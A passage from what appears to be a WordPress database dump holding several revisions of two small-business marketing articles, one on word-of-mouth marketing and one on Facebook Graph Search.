local events where theyll be able to mention your company if youve impressed them. And of course, locals in the area will be looking for information on their local area online.\r\n\r\nNow Ive made a search on Google for bloggers Manchester and the third result that popped up was “The Manchizzle blog by Kate Feld, tagline “The pick of Manchester culture and hub of blogging goodness.\r\n\r\nIts a great blog, but whats really interesting is a fantastic blogroll (list) of Manchester and North West England-based city and neighbourhood blogs, foodie blogs, and culture, fashion and design blogs down the side. Heres a selection:\r\n\r\n<img class=\"size-full wp-image-1133 aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/07/machester-blogs.png\" alt=\"Manchester Blogs\" width=\"227\" height=\"299\" />\r\n\r\nAmong these may very well be a blogger who wants to talk about your business or review you.\r\n<h2>How to engage with local influencers when you find them</h2>\r\n<ul>\r\n <li>Retweet their content with a useful comment</li>\r\n <li>Email them</li>\r\n <li>Engage them in conversation on Twitter and Facebook</li>\r\n <li>Ask them questions (not by direct messaging them)</li>\r\n <li>Offer them a free product or service to review</li>\r\n <li>And if youve referred to their content in a blog post, dont be shy: let them know.</li>\r\n</ul>\r\nKeep a track of the conversations youre having with a tool like <a href=\"http://www.nimble.com/\">Nimble</a> or youll forget you who youve already contacted.\r\n<h2>Deviate from the Expected</h2>\r\nConversations about brands or products begin when the experience of a purchased product deviates from the expected whether that be in a positive or negative way. Think about how youve reacted to something thats exceeded your expectations or disappointed you.\r\n\r\nYou may well have mentioned it to someone else. This could be to do with the product or, an advert or with a matter of customer support. Here are some examples of how companies have exceeded expectations:\r\n<h2>Delivery, Packaging and Freebies</h2>\r\nEtsy sellers have it down pat when it comes to going the extra mile. They need to because theyre in an extremely competitive market.\r\n\r\nA personal example: Christmas 2012 I ordered a tie as a present and it came beautifully wrapped in a little crisp cellophane parcel tied with a ribbon (it was a beautiful tie, too). Ive told four people about that company and Ive bookmarked them for my next tie purchases (I know someone whos very fond of quirky ties).\r\n\r\nAs well as great packaging, Kelly provides free swatches, fantastic quality and fast delivery. Ill bet these happy customers have mentioned her to someone else:\r\n\r\n“The ties were everything and more of what I had hoped for. Great Quality! You went above and beyond with the pocket squares. THANK YOU SO MUCH!!!! I would refer you to anyone!!! Great service and fast delivery!!!\r\n\r\nHeres feedback for another seller, <a href=\"http://www.etsy.com/uk/shop/RootsAndWingsJewelry\">RootsAndWingsJewelry</a>\r\n\r\n“Item received in a timely manner. packaging was fun and Eco-friendly, which I appreciate very much! “\r\n\r\nAnd another, <a href=\"http://www.etsy.com/uk/people/micasita?ref=pr_profile\">Micasita</a>:\r\n\r\n“Excellent pouch, fabric, sewing everything! And it came with stickers as a an Easter present.\r\n\r\nHow have these sellers deviated from the expected?\r\n<ul>\r\n <li>Fast delivery, a free sample or little extra present and great packaging are all ways to add quality, make you memorable and drive conversations. Dont promise fast delivery if it doesnt normally happen, though.</li>\r\n <li>Bricks and mortar shops, use handouts and takeaways sweets, pens or even fridge magnets something to remind your customer to mention your company when they take the item out of their pocket at home.</li>\r\n <li>Online companies like web designers and B2B, provide graphics with your logo, name and/or email address prominently displayed.</li>\r\n</ul>\r\n \r\n<h2>Conversation Triggers</h2>\r\nConversation triggers are small items that get a conversation started when other people see them. Heres an example from <a href=\"http://www.wordofmouth.org/\">WordofMouth.org</a>:\r\n\r\n“Ive taken every business card that Ive received in the past ten years, glued my logo to the back, used a laminator to turn it into a luggage tag, and mailed it back to the person I just met. Ill bet that at least 5,000 people have my logo on their briefcase or suitcase. When they meet each other, they talk about my company. Thats a lot of word of mouth.\r\n\r\nIngenious, isnt it?\r\n<h2>Buzz Marketing</h2>\r\nMark Hughes, author of <a href=\"http://buzzmarketing.com/2010/11/26/push-the-six-buttons-of-buzz-to-start-a-conversation/\">Buzz Marketing</a> says that the public will talk about you (offline and online) if you use some of the following in your campaigns:\r\n<ul>\r\n <li>The Unusual</li>\r\n <li>The Remarkable</li>\r\n <li>The Outrageous</li>\r\n <li>The Taboo</li>\r\n <li>The Hilarious</li>\r\n</ul>','What is Word of Mouth Marketing?','','inherit','closed','closed','','19-revision-v1','','','2017-10-26 08:22:40','2017-10-26 08:22:40','',19,'http://www.dogstardesign.co.uk/19-revision-v1',0,'revision','',0),(21,1,'2017-10-26 08:22:59','2017-10-26 08:22:59',' \r\n\r\nIf you heard about a marketing idea that could bring you more leads and sales, would you be interested in learning more about it? What about an old one that you dont pay much attention to any more but that you probably use to some extent without thinking about it? What about word of mouth marketing?\r\n<h2>What exactly is Word of Mouth Marketing?</h2>\r\n<a href=\"http://www.entrepreneur.com/encyclopedia/word-of-mouth-advertising\">Entrepreneur.com</a> describes word of mouth marketing (WOM or WOMM) as being An unpaid form of promotion in which satisfied customers tell other people how much they like a business, product or service. <a href=\"http://www.wommapedia.org/\">Wommapedia.org</a> says its harnessing the power of people to build brand awareness.\r\n\r\nMarketing concepts like buzz marketing, influencer marketing, viral marketing and social media marketing all comes under the banner of WOM but what theyre talking about basically all boils down to the same thing: getting customers to talk about you and tell others about your product.\r\n\r\n \r\n<h3>The History of WOM</h3>\r\nIts been around as a marketing concept since the 1970s when a psychologist (George Silverman) noticed that a One or two physicians who were having good experiences with a drug would sway an entire group of skeptics. They would even sway a dissatisfied group of ex-prescribers who had had negative experiences!\r\n<h3>Why is WOM important?</h3>\r\n \r\n\r\nThere are a few reasons why word of mouth is as important as ever, despite our reliance on the web:\r\n<ul>\r\n <li>The traditional media newspapers, magazines, TV arent as effective as they used to be. As we all know, fewer of us are consuming them (Im as guilty as the next person), and we ignore banner ads online.</li>\r\n <li>Intrusive marketing like direct mail, flyers and cold calling isnt effective because weve become immune to it now and see it as an annoyance.</li>\r\n <li>The internet means there could be hundreds of companies out there doing the same thing you are, so you have to have a way of being found and standing out. People talking about you will give you at least some of the visibility you need.</li>\r\n</ul>\r\n<h3>The Stats</h3>\r\na person with 300 friends on Facebook may happily ignore the advice of 290 of them. Its the small, close-knit network of trusted friends that has the real influence.\r\n\r\n \r\n\r\nProviders of local SEO tools, BrightLocal, found in a 2012 survey of consumers that\r\n\r\n77% of people have recommended a local business to someone they know via WOM.\r\n\r\n36% of company owners rate word of mouth as best for their business.\r\n\r\nAll they need to do is know how to harness that willingness to recommend for their own business. Easy, eh?\r\n\r\nThe importance of social media in spreading the word is important (especially Facebook), but still, conversations about brands are largely done offline В 90% of them, according to the authors of Face-t0-Face (and 75%, according to the Keller Fay Group).\r\n<h2>Encouraging word of mouth conversations</h2>\r\nHowever, with moreВ of us than ever before getting our news online, and conversation topics being generated there, well need to split our efforts between online and offline.\r\n\r\nIn this article Ill suggest some methods and provide real-life examples on how local businesses can encourage word of mouth conversations.\r\n<h2>Local Influencers</h2>\r\nBear in mind that your Facebook and Twitter fans arent the only ones you need to be targeting WOM campaigns with.\r\n\r\nOnly 1% of social media users create over half of the conversations, and those influencers spreading the word about your company will be a much quicker and more effective way of spreading the word. As well as helping to bring in new customers, theyll help to keep your brand in the minds of those who have already clicked your Like button but havent been back to your Facebook page since.\r\n\r\nAnother benefit of targeting influencers is that it doesnt devour too much in the way of resources: a survey by Technorati found that only 6% of companies marketing budgets were used up by it.\r\n\r\nIdeally, you should be looking for global influencers in your niche as well as local influencers. Links from those top influencers can result it great quality links. However, in terms of word of marketing for local businesses, Ill look at finding local influencers.\r\n\r\n \r\n<h3>Google</h3>\r\n \r\n\r\nTheres been a phenomenal rise in local bloggers in recent years who focus mainly on their local area. Get in touch with them they can do marvels for your business because they attend local events where theyll be able to mention your company if youve impressed them. And of course, locals in the area will be looking for information on their local area online.\r\n\r\nNow Ive made a search on Google for bloggers Manchester and the third result that popped up was “The Manchizzle blog by Kate Feld, tagline “The pick of Manchester culture and hub of blogging goodness.\r\n\r\nIts a great blog, but whats really interesting is a fantastic blogroll (list) of Manchester and North West England-based city and neighbourhood blogs, foodie blogs, and culture, fashion and design blogs down the side. Heres a selection:\r\n\r\n \r\n\r\nAmong these may very well be a blogger who wants to talk about your business or review you.\r\n<h2>How to engage with local influencers when you find them</h2>\r\n<ul>\r\n <li>Retweet their content with a useful comment</li>\r\n <li>Email them</li>\r\n <li>Engage them in conversation on Twitter and Facebook</li>\r\n <li>Ask them questions (not by direct messaging them)</li>\r\n <li>Offer them a free product or service to review</li>\r\n <li>And if youve referred to their content in a blog post, dont be shy: let them know.</li>\r\n</ul>\r\nKeep a track of the conversations youre having with a tool like <a href=\"http://www.nimble.com/\">Nimble</a> or youll forget you who youve already contacted.\r\n<h2>Deviate from the Expected</h2>\r\nConversations about brands or products begin when the experience of a purchased product deviates from the expected whether that be in a positive or negative way. Think about how youve reacted to something thats exceeded your expectations or disappointed you.\r\n\r\nYou may well have mentioned it to someone else. This could be to do with the product or, an advert or with a matter of customer support. Here are some examples of how companies have exceeded expectations:\r\n<h2>Delivery, Packaging and Freebies</h2>\r\nEtsy sellers have it down pat when it comes to going the extra mile. They need to because theyre in an extremely competitive market.\r\n\r\nA personal example: Christmas 2012 I ordered a tie as a present and it came beautifully wrapped in a little crisp cellophane parcel tied with a ribbon (it was a beautiful tie, too). Ive told four people about that company and Ive bookmarked them for my next tie purchases (I know someone whos very fond of quirky ties).\r\n\r\nAs well as great packaging, Kelly provides free swatches, fantastic quality and fast delivery. Ill bet these happy customers have mentioned her to someone else:\r\n\r\n“The ties were everything and more of what I had hoped for. Great Quality! You went above and beyond with the pocket squares. THANK YOU SO MUCH!!!! I would refer you to anyone!!! Great service and fast delivery!!!\r\n\r\nHeres feedback for another seller, <a href=\"http://www.etsy.com/uk/shop/RootsAndWingsJewelry\">RootsAndWingsJewelry</a>\r\n\r\n“Item received in a timely manner. packaging was fun and Eco-friendly, which I appreciate very much! “\r\n\r\nAnd another, <a href=\"http://www.etsy.com/uk/people/micasita?ref=pr_profile\">Micasita</a>:\r\n\r\n“Excellent pouch, fabric, sewing everything! And it came with stickers as a an Easter present.\r\n\r\nHow have these sellers deviated from the expected?\r\n<ul>\r\n <li>Fast delivery, a free sample or little extra present and great packaging are all ways to add quality, make you memorable and drive conversations. Dont promise fast delivery if it doesnt normally happen, though.</li>\r\n <li>Bricks and mortar shops, use handouts and takeaways sweets, pens or even fridge magnets something to remind your customer to mention your company when they take the item out of their pocket at home.</li>\r\n <li>Online companies like web designers and B2B, provide graphics with your logo, name and/or email address prominently displayed.</li>\r\n</ul>\r\n \r\n<h2>Conversation Triggers</h2>\r\nConversation triggers are small items that get a conversation started when other people see them. Heres an example from <a href=\"http://www.wordofmouth.org/\">WordofMouth.org</a>:\r\n\r\n“Ive taken every business card that Ive received in the past ten years, glued my logo to the back, used a laminator to turn it into a luggage tag, and mailed it back to the person I just met. Ill bet that at least 5,000 people have my logo on their briefcase or suitcase. When they meet each other, they talk about my company. Thats a lot of word of mouth.\r\n\r\nIngenious, isnt it?\r\n<h2>Buzz Marketing</h2>\r\nMark Hughes, author of <a href=\"http://buzzmarketing.com/2010/11/26/push-the-six-buttons-of-buzz-to-start-a-conversation/\">Buzz Marketing</a> says that the public will talk about you (offline and online) if you use some of the following in your campaigns:\r\n<ul>\r\n <li>The Unusual</li>\r\n <li>The Remarkable</li>\r\n <li>The Outrageous</li>\r\n <li>The Taboo</li>\r\n <li>The Hilarious</li>\r\n</ul>','What is Word of Mouth Marketing?','','inherit','closed','closed','','19-revision-v1','','','2017-10-26 08:22:59','2017-10-26 08:22:59','',19,'http://www.dogstardesign.co.uk/19-revision-v1',0,'revision','',0),(22,1,'2017-10-26 08:25:24','2017-10-26 08:25:24',' \r\n\r\nFacebook Graph Search has been causing quite a bit of excitement among marketers.\r\n\r\nIts been around for a while if youve been trying out their beta version, and its recently rolled out to all US and UK account holders so now we can all take advantage of it.\r\n\r\nThe question is, will it be a help to small, local businesses? And, if so, how do we make the most of it?\r\n\r\nHere are a few answers.\r\n<h2>How being on Graph Search helps your Business</h2>\r\nGraph Search is Facebooks equivalent of a search engine. But it doesnt work in the way Google works.\r\n\r\nFacebook Graph Search is all about <b>personal recommendations</b>, so if youre looking for an Italian restaurant in Manchester, youll be shown Italian restaurants that the greater number of your friends, or connections to your friends, have been to, recommended or posted images of.\r\n\r\nHeres an example search Ive done:\r\n\r\n \r\n\r\nThe restaurants in the image above where at the top of my results and youll see that each of them have lots of likes.\r\n\r\nTherefore, getting lots of likes is going to be important “ well cover that a bit further down – but well also be offering advice on which are the other boxes your business needs to tick to have a chance of being shown on Graph Search.\r\n<h2>Choose the Right Category</h2>\r\n \r\n\r\nIf you havent yet set up your Business Page on Facebook Its important to get this one right from the start if you can, so that Facebook can decide where you fit in the grand scheme of things. Your category is the one Facebook uses to bring up your business details.\r\n\r\nLocal bricks and mortar stores will probably want Local Business or Place and purely online companies should go for Company, Organization or Institution.\r\n\r\nYoull be given a choice of category types when you click any of those category buttons. For example under Local Business or Place youll be presented with Food/Grocery, Book Store, Hotel and many more. Pick the one that most closely describes your business.\r\n\r\nIdea: If you cant find anything suitable from that list, select Local Business.\r\n\r\n \r\n\r\nNow enter your business contact details as accurately as you can and write it to match whats showing on your website. (If you make a mistake it can be changed later, though.) Again, Facebook uses your location when providing results on Graph Search.\r\n<h2>Have a great About section</h2>\r\n \r\n\r\nFacebook makes use of the About text to find the most relevant business for their Graph Search results, so follow these basic points:\r\n<ul>\r\n <li>В·Make it descriptive and to the point.</li>\r\n <li>В·Use a keyword or two that your customers are using to find your type of business (use <a href=\"http://adwords.google.co.uk/o/Targeting/Explorer?__u=1000000000&__c=1000000000&ideaRequestType=KEYWORD_IDEAS\">Google AdWords tool</a> or the free <a href=\"http://www.wordtracker.com/\">Wordtracker tool</a>).</li>\r\n <li>В·Dont stuff with keywords!</li>\r\n <li>В·Remember, your prospective customers will see it and hopefully be inspired to find out more about you, so it needs to be readable and present you in a great light.</li>\r\n <li>В·Add your website URL in there as well – thats a must.</li>\r\n</ul>\r\nNext youll be prompted to add a lovely picture of your business. Something professional taken on a sunny day will do wonders.\r\n\r\nThen create a Facebook Web Address, ie <a href=\"https://www.facebook.com/juicycaliforniafruit\">http://www.facebook.com/juicycaliforniafruit</a>\r\n\r\nAnd youre part of the way there.\r\n<h2>Mission Statement and Long Description</h2>\r\nOn your Business Page, click on the About button under your profile picture, and click the Edit button next to Basic Info.\r\n\r\n \r\n\r\nThis is the page that appears:\r\n\r\n \r\n\r\nFill in everything you can, including your Mission statement and Long Description.\r\n\r\nHeres a nice example of a business, <a href=\"https://www.facebook.com/MonteCristoBookshop/info\">The Monte Cristo Bookshop</a> who have used all the Long Description space to great effect:\r\n\r\n \r\n\r\nThat examples taken from the article <a href=\"http://www.andreavahl.com/facebook/4-inspiring-examples-of-an-engaging-facebook-about-page.php\">4 Inspiring Examples of an Engaging Facebook About Page</a> by Andrea Vahl and its well worth having a glance over for inspiration.\r\n<h2>Get More Likes</h2>\r\nAs we saw at the beginning, Likes count big time. Getting them is easier said than done, as you know. But here are a few of the best articles Ive come across with genuinely useful ideas for getting more likes.\r\n\r\nThe excellent <a href=\"http://theoatmeal.com/comics/facebook_likes\">Less Marketing Douchebaggery More Tanks</a> cartoon advises on a non-begging strategy.\r\n\r\n<a href=\"http://www.stateofsearch.com/ten-real-ways-to-get-more-facebook-likes/\">Ten *Real* Ways to Get More Facebook Likes</a> provides 10 actual, non-woolly examples of getting Likes.\r\n\r\n<a href=\"http://www.postplanner.com/9-surefire-ways-to-get-more-likes-on-your-facebook-page/\">9 Surefire Ways to Get More Likes on Your Facebook Page</a> also give tips and tricks you may not have thought of.\r\n<h2>Get More Check-Ins</h2>\r\nShow how popular your business is by encouraging check-ins. The more of these you get, the more likely it is youll appear in the Graph Search results.\r\n<h2>Photos Galore</h2>\r\nGraph Search makes it easy to search for images, therefore you should be posting lots of images, and encouraging your visitors to post them, too.\r\n\r\n \r\n\r\nYou see why its a good thing to have photos on Facebook?\r\n\r\nIdea: Run a competition for the best picture taken in or of your restaurant or shop and ask customers to tag your business in them.\r\n<h2>Summary</h2>\r\nThe Graph Search algorithm will change with time, as Facebook slowly but surely add new features to the platform and adjust the relative importance of each of them. And only time will tell what methods marketers are going to find the most successful in making the most of it.\r\n\r\nIf you follow the tips above, however, youre well on your way to getting seen in Facebook Graph Search.\r\n\r\nWe at Target Local will be keeping our eyes peeled and keeping our readers up to date with the latest in the ever-changing social media landscape. So sign up to receive future notifications and get in touch if youve any questions about how you can benefit from Facebook Graph Search.','How to Use Facebook Graph Search','','publish','closed','closed','','how-to-use-facebook-graph-search','','','2017-10-26 08:27:36','2017-10-26 08:27:36','',0,'http://www.dogstardesign.co.uk/?page_id=22',0,'page','',0),(23,1,'2017-10-26 08:25:24','2017-10-26 08:25:24','<img class=\"aligncenter size-full wp-image-1487\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/facebook-graph-search1.png\" alt=\"facebook-graph-search\" width=\"880\" height=\"300\" />\r\n\r\nFacebook Graph Search has been causing quite a bit of excitement among marketers.\r\n\r\nIts been around for a while if youve been trying out their beta version, and its recently rolled out to all US and UK account holders so now we can all take advantage of it.\r\n\r\nThe question is, will it be a help to small, local businesses? And, if so, how do we make the most of it?\r\n\r\nHere are a few answers.\r\n<h2>How being on Graph Search helps your Business</h2>\r\nGraph Search is Facebooks equivalent of a search engine. But it doesnt work in the way Google works.\r\n\r\nFacebook Graph Search is all about <b>personal recommendations</b>, so if youre looking for an Italian restaurant in Manchester, youll be shown Italian restaurants that the greater number of your friends, or connections to your friends, have been to, recommended or posted images of.\r\n\r\nHeres an example search Ive done:\r\n\r\n<img class=\"aligncenter size-full wp-image-1433\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/0002_facebook-graph-search-1.png\" alt=\"_0002_facebook-graph-search-1\" width=\"386\" height=\"349\" />\r\n\r\nThe restaurants in the image above where at the top of my results and youll see that each of them have lots of likes.\r\n\r\nTherefore, getting lots of likes is going to be important “ well cover that a bit further down – but well also be offering advice on which are the other boxes your business needs to tick to have a chance of being shown on Graph Search.\r\n<h2>Choose the Right Category</h2>\r\n<img class=\"aligncenter size-full wp-image-1434\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/0000_Facebook-categories.png\" alt=\"_0000_Facebook-categories\" width=\"588\" height=\"349\" />\r\n\r\nIf you havent yet set up your Business Page on Facebook Its important to get this one right from the start if you can, so that Facebook can decide where you fit in the grand scheme of things. Your category is the one Facebook uses to bring up your business details.\r\n\r\nLocal bricks and mortar stores will probably want Local Business or Place and purely online companies should go for Company, Organization or Institution.\r\n\r\nYoull be given a choice of category types when you click any of those category buttons. For example under Local Business or Place youll be presented with Food/Grocery, Book Store, Hotel and many more. Pick the one that most closely describes your business.\r\n\r\nIdea: If you cant find anything suitable from that list, select Local Business.\r\n\r\n<img class=\"aligncenter size-full wp-image-1435\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/local-business-address.png\" alt=\"local-business-address\" width=\"290\" height=\"290\" />\r\n\r\nNow enter your business contact details as accurately as you can and write it to match whats showing on your website. (If you make a mistake it can be changed later, though.) Again, Facebook uses your location when providing results on Graph Search.\r\n<h2>Have a great About section</h2>\r\n<img class=\"aligncenter size-full wp-image-1436\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/juicy-california-fruit.png\" alt=\"juicy-california-fruit\" width=\"598\" height=\"314\" />\r\n\r\nFacebook makes use of the About text to find the most relevant business for their Graph Search results, so follow these basic points:\r\n<ul>\r\n <li>В·Make it descriptive and to the point.</li>\r\n <li>В·Use a keyword or two that your customers are using to find your type of business (use <a href=\"http://adwords.google.co.uk/o/Targeting/Explorer?__u=1000000000&__c=1000000000&ideaRequestType=KEYWORD_IDEAS\">Google AdWords tool</a> or the free <a href=\"http://www.wordtracker.com/\">Wordtracker tool</a>).</li>\r\n <li>В·Dont stuff with keywords!</li>\r\n <li>В·Remember, your prospective customers will see it and hopefully be inspired to find out more about you, so it needs to be readable and present you in a great light.</li>\r\n <li>В·Add your website URL in there as well – thats a must.</li>\r\n</ul>\r\nNext youll be prompted to add a lovely picture of your business. Something professional taken on a sunny day will do wonders.\r\n\r\nThen create a Facebook Web Address, ie <a href=\"https://www.facebook.com/juicycaliforniafruit\">http://www.facebook.com/juicycaliforniafruit</a>\r\n\r\nAnd youre part of the way there.\r\n<h2>Mission Statement and Long Description</h2>\r\nOn your Business Page, click on the About button under your profile picture, and click the Edit button next to Basic Info.\r\n\r\n<img class=\"aligncenter size-full wp-image-1437\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/about-button.png\" alt=\"about-button\" width=\"518\" height=\"290\" />\r\n\r\nThis is the page that appears:\r\n\r\n<img class=\"aligncenter size-full wp-image-1438\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/0001_facebook-page-info.png\" alt=\"_0001_facebook-page-info\" width=\"663\" height=\"349\" />\r\n\r\nFill in everything you can, including your Mission statement and Long Description.\r\n\r\nHeres a nice example of a business, <a href=\"https://www.facebook.com/MonteCristoBookshop/info\">The Monte Cristo Bookshop</a> who have used all the Long Description space to great effect:\r\n\r\n<img class=\"aligncenter size-full wp-image-1439\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/0000_Monte-Cristo-Bookshop.png\" alt=\"_0000_Monte-Cristo-Bookshop\" width=\"290\" height=\"349\" />\r\n\r\nThat examples taken from the article <a href=\"http://www.andreavahl.com/facebook/4-inspiring-examples-of-an-engaging-facebook-about-page.php\">4 Inspiring Examples of an Engaging Facebook About Page</a> by Andrea Vahl and its well worth having a glance over for inspiration.\r\n<h2>Get More Likes</h2>\r\nAs we saw at the beginning, Likes count big time. Getting them is easier said than done, as you know. But here are a few of the best articles Ive come across with genuinely useful ideas for getting more likes.\r\n\r\nThe excellent <a href=\"http://theoatmeal.com/comics/facebook_likes\">Less Marketing Douchebaggery More Tanks</a> cartoon advises on a non-begging strategy.\r\n\r\n<a href=\"http://www.stateofsearch.com/ten-real-ways-to-get-more-facebook-likes/\">Ten *Real* Ways to Get More Facebook Likes</a> provides 10 actual, non-woolly examples of getting Likes.\r\n\r\n<a href=\"http://www.postplanner.com/9-surefire-ways-to-get-more-likes-on-your-facebook-page/\">9 Surefire Ways to Get More Likes on Your Facebook Page</a> also give tips and tricks you may not have thought of.\r\n<h2>Get More Check-Ins</h2>\r\nShow how popular your business is by encouraging check-ins. The more of these you get, the more likely it is youll appear in the Graph Search results.\r\n<h2>Photos Galore</h2>\r\nGraph Search makes it easy to search for images, therefore you should be posting lots of images, and encouraging your visitors to post them, too.\r\n\r\n<img class=\"aligncenter size-full wp-image-1440\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/0000_photos-enfield.png\" alt=\"_0000_photos-enfield\" width=\"695\" height=\"349\" />\r\n\r\nYou see why its a good thing to have photos on Facebook?\r\n\r\nIdea: Run a competition for the best picture taken in or of your restaurant or shop and ask customers to tag your business in them.\r\n<h2>Summary</h2>\r\nThe Graph Search algorithm will change with time, as Facebook slowly but surely add new features to the platform and adjust the relative importance of each of them. And only time will tell what methods marketers are going to find the most successful in making the most of it.\r\n\r\nIf you follow the tips above, however, youre well on your way to getting seen in Facebook Graph Search.\r\n\r\nWe at Target Local will be keeping our eyes peeled and keeping our readers up to date with the latest in the ever-changing social media landscape. So sign up to receive future notifications and get in touch if youve any questions about how you can benefit from Facebook Graph Search.','How to Use Facebook Graph Search','','inherit','closed','closed','','22-revision-v1','','','2017-10-26 08:25:24','2017-10-26 08:25:24','',22,'http://www.dogstardesign.co.uk/22-revision-v1',0,'revision','',0),(24,1,'2017-10-26 08:27:28','2017-10-26 08:27:28',' \n\nFacebook Graph Search has been causing quite a bit of excitement among marketers.\n\nIts been around for a while if youve been trying out their beta version, and its recently rolled out to all US and UK account holders so now we can all take advantage of it.\n\nThe question is, will it be a help to small, local businesses? And, if so, how do we make the most of it?\n\nHere are a few answers.\n<h2>How being on Graph Search helps your Business</h2>\nGraph Search is Facebooks equivalent of a search engine. But it doesnt work in the way Google works.\n\nFacebook Graph Search is all about <b>personal recommendations</b>, so if youre looking for an Italian restaurant in Manchester, youll be shown Italian restaurants that the greater number of your friends, or connections to your friends, have been to, recommended or posted images of.\n\nHeres an example search Ive done:\n\n \n\nThe restaurants in the image above where at the top of my results and youll see that each of them have lots of likes.\n\nTherefore, getting lots of likes is going to be important “ well cover that a bit further down – but well also be offering advice on which are the other boxes your business needs to tick to have a chance of being shown on Graph Search.\n<h2>Choose the Right Category</h2>\n \n\nIf you havent yet set up your Business Page on Facebook Its important to get this one right from the start if you can, so that Facebook can decide where you fit in the grand scheme of things. Your category is the one Facebook uses to bring up your business details.\n\nLocal bricks and mortar stores will probably want Local Business or Place and purely online companies should go for Company, Organization or Institution.\n\nYoull be given a choice of category types when you click any of those category buttons. For example under Local Business or Place youll be presented with Food/Grocery, Book Store, Hotel and many more. Pick the one that most closely describes your business.\n\nIdea: If you cant find anything suitable from that list, select Local Business.\n\n \n\nNow enter your business contact details as accurately as you can and write it to match whats showing on your website. (If you make a mistake it can be changed later, though.) Again, Facebook uses your location when providing results on Graph Search.\n<h2>Have a great About section</h2>\n<img class=\"aligncenter size-full wp-image-1436\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/juicy-california-fruit.png\" alt=\"juicy-california-fruit\" width=\"598\" height=\"314\" />\n\nFacebook makes use of the About text to find the most relevant business for their Graph Search results, so follow these basic points:\n<ul>\n <li>В·Make it descriptive and to the point.</li>\n <li>В·Use a keyword or two that your customers are using to find your type of business (use <a href=\"http://adwords.google.co.uk/o/Targeting/Explorer?__u=1000000000&__c=1000000000&ideaRequestType=KEYWORD_IDEAS\">Google AdWords tool</a> or the free <a href=\"http://www.wordtracker.com/\">Wordtracker tool</a>).</li>\n <li>В·Dont stuff with keywords!</li>\n <li>В·Remember, your prospective customers will see it and hopefully be inspired to find out more about you, so it needs to be readable and present you in a great light.</li>\n <li>В·Add your website URL in there as well – thats a must.</li>\n</ul>\nNext youll be prompted to add a lovely picture of your business. Something professional taken on a sunny day will do wonders.\n\nThen create a Facebook Web Address, ie <a href=\"https://www.facebook.com/juicycaliforniafruit\">http://www.facebook.com/juicycaliforniafruit</a>\n\nAnd youre part of the way there.\n<h2>Mission Statement and Long Description</h2>\nOn your Business Page, click on the About button under your profile picture, and click the Edit button next to Basic Info.\n\n<img class=\"aligncenter size-full wp-image-1437\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/about-button.png\" alt=\"about-button\" width=\"518\" height=\"290\" />\n\nThis is the page that appears:\n\n<img class=\"aligncenter size-full wp-image-1438\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/0001_facebook-page-info.png\" alt=\"_0001_facebook-page-info\" width=\"663\" height=\"349\" />\n\nFill in everything you can, including your Mission statement and Long Description.\n\nHeres a nice example of a business, <a href=\"https://www.facebook.com/MonteCristoBookshop/info\">The Monte Cristo Bookshop</a> who have used all the Long Description space to great effect:\n\n<img class=\"aligncenter size-full wp-image-1439\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/0000_Monte-Cristo-Bookshop.png\" alt=\"_0000_Monte-Cristo-Bookshop\" width=\"290\" height=\"349\" />\n\nThat examples taken from the article <a href=\"http://www.andreavahl.com/facebook/4-inspiring-examples-of-an-engaging-facebook-about-page.php\">4 Inspiring Examples of an Engaging Facebook About Page</a> by Andrea Vahl and its well worth having a glance over for inspiration.\n<h2>Get More Likes</h2>\nAs we saw at the beginning, Likes count big time. Getting them is easier said than done, as you know. But here are a few of the best articles Ive come across with genuinely useful ideas for getting more likes.\n\nThe excellent <a href=\"http://theoatmeal.com/comics/facebook_likes\">Less Marketing Douchebaggery More Tanks</a> cartoon advises on a non-begging strategy.\n\n<a href=\"http://www.stateofsearch.com/ten-real-ways-to-get-more-facebook-likes/\">Ten *Real* Ways to Get More Facebook Likes</a> provides 10 actual, non-woolly examples of getting Likes.\n\n<a href=\"http://www.postplanner.com/9-surefire-ways-to-get-more-likes-on-your-facebook-page/\">9 Surefire Ways to Get More Likes on Your Facebook Page</a> also give tips and tricks you may not have thought of.\n<h2>Get More Check-Ins</h2>\nShow how popular your business is by encouraging check-ins. The more of these you get, the more likely it is youll appear in the Graph Search results.\n<h2>Photos Galore</h2>\nGraph Search makes it easy to search for images, therefore you should be posting lots of images, and encouraging your visitors to post them, too.\n\n<img class=\"aligncenter size-full wp-image-1440\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/08/0000_photos-enfield.png\" alt=\"_0000_photos-enfield\" width=\"695\" height=\"349\" />\n\nYou see why its a good thing to have photos on Facebook?\n\nIdea: Run a competition for the best picture taken in or of your restaurant or shop and ask customers to tag your business in them.\n<h2>Summary</h2>\nThe Graph Search algorithm will change with time, as Facebook slowly but surely add new features to the platform and adjust the relative importance of each of them. And only time will tell what methods marketers are going to find the most successful in making the most of it.\n\nIf you follow the tips above, however, youre well on your way to getting seen in Facebook Graph Search.\n\nWe at Target Local will be keeping our eyes peeled and keeping our readers up to date with the latest in the ever-changing social media landscape. So sign up to receive future notifications and get in touch if youve any questions about how you can benefit from Facebook Graph Search.','How to Use Facebook Graph Search','','inherit','closed','closed','','22-autosave-v1','','','2017-10-26 08:27:28','2017-10-26 08:27:28','',22,'http://www.dogstardesign.co.uk/22-autosave-v1',0,'revision','',0),(25,1,'2017-10-26 